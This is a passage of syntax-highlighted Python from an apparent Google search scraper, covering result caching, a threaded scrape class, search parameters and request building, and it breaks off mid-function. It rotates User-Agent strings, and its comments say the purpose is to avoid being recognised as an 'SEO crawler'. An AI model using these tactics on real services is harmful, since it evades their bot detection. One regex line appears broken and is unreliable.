<span class="n">sha</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha256</span><span class="p">()</span>
<span class="c1"># Make a unique file name based on the values of the google search parameters.</span>
<span class="n">sha</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="sa">b</span><span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">search_params</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">s</span><span class="p">))</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">search_params</span><span class="o">.</span><span class="n">keys</span><span class="p">())))</span>
<span class="k">return</span> <span class="s1">'</span><span class="si">{}</span><span class="s1">.</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sha</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="s1">'cache'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">get_cached</span><span class="p">(</span><span class="n">search_params</span><span class="p">):</span>
<span class="sd">"""Loads a cached search results page from scrapecache/fname.cache</span>
<span class="sd"> It helps in testing and avoid requesting</span>
<span class="sd"> the same resources again and again (such that google may</span>
<span class="sd"> recognize us as what we are: Sneaky SEO crawlers!)</span>
<span class="sd"> """</span>
<span class="n">fname</span> <span class="o">=</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="n">search_params</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">fname</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">):</span>
<span class="c1"># If the cached file is older than 12 hours, return False and thus</span>
<span class="c1"># make a new fresh request.</span>
<span class="n">modtime</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">))</span>
<span class="k">if</span> <span class="p">(</span><span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">modtime</span><span class="p">)</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">/</span> <span class="mi">60</span> <span class="o">></span> <span class="mi">12</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">),</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
<span class="k">return</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">FileNotFoundError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">Exception</span><span class="p">(</span><span class="s1">'Unexpected file not found: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="o">.</span><span class="n">msg</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">cache_results</span><span class="p">(</span><span class="n">search_params</span><span class="p">,</span> <span class="n">html</span><span class="p">):</span>
<span class="sd">"""Stores a html resource as a file in scrapecache/fname.cache</span>
<span class="sd"> This will always write(overwrite) the cache file.</span>
<span class="sd"> """</span>
<span class="n">fname</span> <span class="o">=</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="n">search_params</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">fname</span><span class="p">),</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
<span class="n">fd</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">GoogleScrape</span><span class="p">(</span><span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">):</span>
<span class="sd">"""Offers a fast way to query the google search engine.</span>
<span class="sd"> Overrides the run() method of the superclass threading.Thread.</span>
<span class="sd"> Each thread represents a crawl for one Google Results Page.</span>
<span class="sd"> http://www.blueglass.com/blog/google-search-url-parameters-query-string-anatomy/</span>
<span class="sd"> """</span>
<span class="c1"># Valid URL (taken from django)</span>
<span class="n">_REGEX_VALID_URL</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span>
<span class="sa">r</span><span class="s1">'^(?:http|ftp)s?://'</span> <span class="c1"># http:// or https://</span>
<span class="sa">r</span><span class="s1">'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'</span> <span class="c1"># domain...</span>
<span class="sa">r</span><span class="s1">'localhost|'</span> <span class="c1"># localhost...</span>
<span class="sa">r</span><span class="s1">'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'</span> <span class="c1"># ...or ip</span>
<span class="sa">r</span><span class="s1">'(?::\d+)?'</span> <span class="c1"># optional port</span>
<span class="sa">r</span><span class="s1">'(?:/?|[/?]\S+)$'</span><span class="p">,</span> <span class="n">re</span><span class="o">.</span><span class="n">IGNORECASE</span><span class="p">)</span>
<span class="n">_REGEX_VALID_URL_SIMPLE</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span>
<span class="s1">'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'</span><span class="p">)</span>
<span class="c1"># Named tuple type for the search results</span>
<span class="n">Result</span> <span class="o">=</span> <span class="n">namedtuple</span><span class="p">(</span><span class="s1">'LinkResult'</span><span class="p">,</span> <span class="s1">'link_title link_snippet link_url'</span><span class="p">)</span>
<span class="c1"># Several different User-Agents to diversify the requests.</span>
<span class="c1"># Keep the User-Agents updated. Last update: 17th february 14</span>
<span class="c1"># Get them here: http://techblog.willshouse.com/2012/01/03/most-common-user-agents/</span>
<span class="n">_UAS</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0'</span><span class="p">,</span>
<span class="s1">'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36'</span>
<span class="p">]</span>
<span class="n">_HEADERS</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'User-Agent'</span><span class="p">:</span> <span class="s1">'Mozilla/5.0'</span><span class="p">,</span>
<span class="s1">'Accept'</span><span class="p">:</span> <span class="s1">'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'</span><span class="p">,</span>
<span class="s1">'Accept-Encoding'</span><span class="p">:</span> <span class="s1">'gzip, deflate'</span><span class="p">,</span>
<span class="s1">'Connection'</span><span class="p">:</span> <span class="s1">'close'</span><span class="p">,</span>
<span class="s1">'DNT'</span><span class="p">:</span> <span class="s1">'1'</span>
<span class="p">}</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">search_query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="o">=</span><span class="mi">10</span><span class="p">,</span> <span class="n">num_page</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">search_params</span><span class="o">=</span><span class="p">{}):</span>
<span class="sd">"""Initialises an object responsible for scraping one particular results page.</span>
<span class="sd"> @param search_query: The query to scrape for.</span>
<span class="sd"> @param num_results_per_page: The number of results per page. Must be smaller than 1000.</span>
<span class="sd"> (My tests though have shown that at most 100 results were returned per page)</span>
<span class="sd"> @param num_page: The number/index of the page.</span>
<span class="sd"> @param search_params: A dictionary with additional search params. The default search params is updated with this parameter.</span>
<span class="sd"> """</span>
<span class="nb">super</span><span class="p">()</span><span class="o">.</span><span class="fm">__init__</span><span class="p">()</span>
<span class="n">logger</span><span class="o">.</span><span class="n">debug</span><span class="p">(</span><span class="s2">"Created new GoogleScrape object with params: query=</span><span class="si">{}</span><span class="s2">, num_results_per_page=</span><span class="si">{}</span><span class="s2">, num_page=</span><span class="si">{}</span><span class="s2">"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span>
<span class="n">search_query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="p">,</span> <span class="n">num_page</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">search_query</span> <span class="o">=</span> <span class="n">search_query</span>
<span class="k">if</span> <span class="n">num_results_per_page</span> <span class="ow">not</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1001</span><span class="p">):</span> <span class="c1"># The maximum value of this parameter is 1000. See search appliance docs</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'The parameter -n must be smaller or equal to 1000'</span><span class="p">)</span>
<span class="k">raise</span> <span class="n">InvalidNumberResultsException</span><span class="p">(</span><span class="n">num_results_per_page</span><span class="p">)</span>
<span class="k">if</span> <span class="n">num_page</span><span class="o">*</span><span class="n">num_results_per_page</span> <span class="o">+</span> <span class="n">num_results_per_page</span> <span class="o">></span> <span class="mi">1000</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'The maximal number of results for a query is 1000'</span><span class="p">)</span>
<span class="k">raise</span> <span class="n">InvalidNumberResultsException</span><span class="p">(</span><span class="n">num_page</span><span class="o">*</span><span class="n">num_results_per_page</span> <span class="o">+</span> <span class="n">num_results_per_page</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">num_results_per_page</span> <span class="o">=</span> <span class="n">num_results_per_page</span>
<span class="bp">self</span><span class="o">.</span><span class="n">num_page</span> <span class="o">=</span> <span class="n">num_page</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_URL</span> <span class="o">=</span> <span class="s1">'http://www.google.com/search'</span>
<span class="c1"># http://www.rankpanel.com/blog/google-search-parameters/</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'q'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># the search query string</span>
<span class="s1">'num'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># the number of results per page</span>
<span class="s1">'numgm'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Number of KeyMatch results to return with the results. A value between 0 to 50 can be specified for this option.</span>
<span class="s1">'start'</span><span class="p">:</span> <span class="s1">'0'</span><span class="p">,</span> <span class="c1"># Specifies the index number of the first entry in the result set that is to be returned. page number = (start / num) + 1</span>
<span class="c1"># The maximum number of results available for a query is 1,000, i.e., the value of the start parameter added to the value of the num parameter cannot exceed 1,000.</span>
<span class="s1">'rc'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># Request an accurate result count for up to 1M documents. If a user submits a search query without the site parameter, the entire search index is queried.</span>
<span class="s1">'site'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Limits search results to the contents of the specified collection.</span>
<span class="s1">'sort'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Specifies a sorting method. Results can be sorted by date.</span>
<span class="s1">'client'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># required parameter. Indicates a valid front end.</span>
<span class="s1">'output'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># required parameter. Selects the format of the search results.</span>
<span class="s1">'partialfields'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Restricts the search results to documents with meta tags whose values contain the specified words or phrases.</span>
<span class="s1">'pws'</span><span class="p">:</span> <span class="s1">'0'</span><span class="p">,</span> <span class="c1"># personalization turned off</span>
<span class="s1">'cd'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Passes down the keyword rank clicked.</span>
<span class="s1">'filter'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># Include omitted results</span>
<span class="s1">'complete'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1">#Turn auto-suggest and Google Instant on (=1) or off (=0)</span>
<span class="s1">'nfpr'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="c1">#Turn off auto-correction of spelling</span>
<span class="s1">'ncr'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="c1">#No country redirect: Allows you to set the Google country engine you would like to use despite your current geographic location.</span>
<span class="s1">'safe'</span><span class="p">:</span> <span class="s1">'off'</span><span class="p">,</span> <span class="c1"># Turns the adult content filter on or off</span>
<span class="s1">'rls'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1">#Source of query with version of the client and language set, other examples are can be found</span>
<span class="s1">'source'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1">#Google navigational parameter specifying where you came from, here universal search</span>
<span class="s1">'tbm'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Used when you select any of the “special” searches, like image search or video search</span>
<span class="s1">'tbs'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Also undocumented as `tbm`, allows you to specialize the time frame of the results you want to obtain.</span>
<span class="c1"># Examples: Any time: tbs=qdr:a, Last second: tbs=qdr:s, Last minute: tbs=qdr:n, Last day: tbs=qdr:d, Time range: tbs=cdr:1,cd_min:3/2/1984,cd_max:6/5/1987</span>
<span class="c1"># But the tbs parameter is also used to specify content:</span>
<span class="c1"># Examples: Sites with images: tbs=img:1, Results by reading level, Basic level: tbs=rl:1,rls:0, Results that are translated from another language: tbs=clir:1,</span>
<span class="c1"># For full documentation, see http://stenevang.wordpress.com/2013/02/22/google-search-url-request-parameters/</span>
<span class="s1">'lr'</span><span class="p">:</span> <span class="s1">'lang_de'</span><span class="p">,</span> <span class="c1"># Restricts searches to pages in the specified language. If there are no results in the specified language, the search appliance displays results in all languages .</span>
<span class="c1"># lang_xx where xx is the country code such as en, de, fr, ca, ...</span>
<span class="s1">'hl'</span><span class="p">:</span> <span class="s1">'en'</span><span class="p">,</span> <span class="c1"># Language settings passed down by your browser</span>
<span class="s1">'cr'</span><span class="p">:</span> <span class="s1">'countryDE'</span><span class="p">,</span> <span class="c1"># The region the results should come from</span>
<span class="s1">'gr'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Just as gl shows you how results look in a specified country, gr limits the results to a certain region</span>
<span class="s1">'gcs'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Limits results to a certain city, you can also use latitude and longitude</span>
<span class="s1">'gpc'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1">#Limits results to a certain zip code</span>
<span class="s1">'gm'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Limits results to a certain metropolitan region</span>
<span class="s1">'gl'</span><span class="p">:</span> <span class="s1">'de'</span><span class="p">,</span> <span class="c1"># as if the search was conducted in a specified location. Can be unreliable.</span>
<span class="s1">'ie'</span><span class="p">:</span> <span class="s1">'utf-8'</span><span class="p">,</span> <span class="c1"># Sets the character encoding that is used to interpret the query string.</span>
<span class="s1">'oe'</span><span class="p">:</span> <span class="s1">'utf-8'</span> <span class="c1"># Sets the character encoding that is used to encode the results.</span>
<span class="p">}</span>
<span class="c1"># Maybe update the default search params when the user has supplied a dictionary</span>
<span class="k">if</span> <span class="n">search_params</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span> <span class="ow">and</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">search_params</span><span class="p">,</span> <span class="nb">dict</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">search_params</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'cache_file'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># A path to a file that caches the results.</span>
<span class="s1">'search_keyword'</span><span class="p">:</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_query</span><span class="p">,</span> <span class="c1"># The query keyword</span>
<span class="s1">'num_results_for_kw'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># The number of results for the keyword</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">[]</span> <span class="c1"># List of Result named tuples</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Make the the scrape and clean the URL's."""</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_search</span><span class="p">()</span>
<span class="c1"># Now try to create ParseResult objects from the URL</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">e</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]):</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">url</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'/url\?q=(?P.*?)&sa=U&ei='</span><span class="p">,</span> <span class="n">e</span><span class="o">.</span><span class="n">link_url</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">assert</span> <span class="bp">self</span><span class="o">.</span><span class="n">_REGEX_VALID_URL</span><span class="o">.</span><span class="n">match</span><span class="p">(</span><span class="n">url</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'results'</span><span class="p">][</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span>
<span class="bp">self</span><span class="o">.</span><span class="n">Result</span><span class="p">(</span><span class="n">link_title</span><span class="o">=</span><span class="n">e</span><span class="o">.</span><span class="n">link_title</span><span class="p">,</span> <span class="n">link_url</span><span class="o">=</span><span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">),</span>
<span class="n">link_snippet</span><span class="o">=</span><span class="n">e</span><span class="o">.</span><span class="n">link_snippet</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">warn</span><span class="p">(</span><span class="s2">"URL=</span><span class="si">{}</span><span class="s2"> found to be invalid."</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">url</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">_build_query</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">random</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span>
<span class="sd">"""Build the headers and params for the GET request towards the Google server.</span>
<span class="sd"> When random is True, several headers (like the UA) are chosen</span>
<span class="sd"> randomly.</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="o">.</span><span class="n">update</span><span class="p">(</span>
<span class="p">{</span><span class="s1">'q'</span><span class="p">:</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_query</span><span class="p">,</span>
<span class="s1">'num'</span><span class="p">:</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">num_results_per_page</span><span class="p">),</span>
<span class="s1">'start'</span><span class="p">:</span> <span class="nb">str</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">num_results_per_page</span><span class="p">)</span> <span class="o">*</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">num_page</span><span class="p">))</span>
<span class="p">})</span>
<span class="k">if</span> <span class="n">random</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_HEADERS</span><span class="p">[</span><span class="s1">'User-Agent'</span><span class="p">]</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_UAS</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">_search</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""The actual search and parsing of the results.</span>
<span class="sd"> Private, internal method.</span>
<span class="sd"> Parsing is done with lxml and cssselect. The html structure of the Google Search</span>
<span class="sd"> results may change over time. Effective: February 2014</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_build_query</span><span class="p">()</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">get_cached</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'cache_file'</span><span class="p">]</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">html</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_URL</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="bp">self</span><span class="o">.</span><span class="n">_HEADERS</span><span class="p">,</span>
<span class="n">params</span><span class="o">=</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mf">3.0</span><span class="p">)</span>
<span class="n">logger</span><span class="o">.</span><span class="n">debug</span><span class="p">(</span><span class="s2">"Scraped with url: </span><span class="si">{}</span><span class="s2">"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">url</span><span class="p">))</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occurred </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">cerr</span><span class="o">.</span><span class="n">msg</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">terr</span><span class="o">.</span><span class="n">msg</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">str</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'5'</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Maybe google recognizes you as sneaky spammer after'</span>
<span class="s1">' you requested their services too inexhaustibly :D'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span>
<span class="c1"># cache fresh results</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
<span class="n">cache_results</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">,</span> <span class="n">html</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'cache_file'</span><span class="p">]</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">))</span>
<span class="c1"># Try to parse the google HTML result using lxml</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">doc</span> <span class="o">=</span> <span class="n">UnicodeDammit</span><span class="p">(</span><span class="n">html</span><span class="p">,</span> <span class="n">is_html</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">HTMLParser</span><span class="p">(</span><span class="n">encoding</span><span class="o">=</span><span class="n">doc</span><span class="o">.</span><span class="n">declared_html_encoding</span><span class="p">)</span>
<span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">document_fromstring</span><span class="p">(</span><span class="n">html</span><span class="p">,</span> <span class="n">parser</span><span class="o">=</span><span class="n">parser</span><span class="p">)</span>
<span class="n">dom</span><span class="o">.</span><span class="n">resolve_base_href</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Some error occurred while lxml tried to parse: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">e</span><span class="o">.</span><span class="n">msg</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Try to extract all links of non-ad results, including their snippets(descriptions) and titles.</span>
<span class="k">try</span><span class="p">:</span>
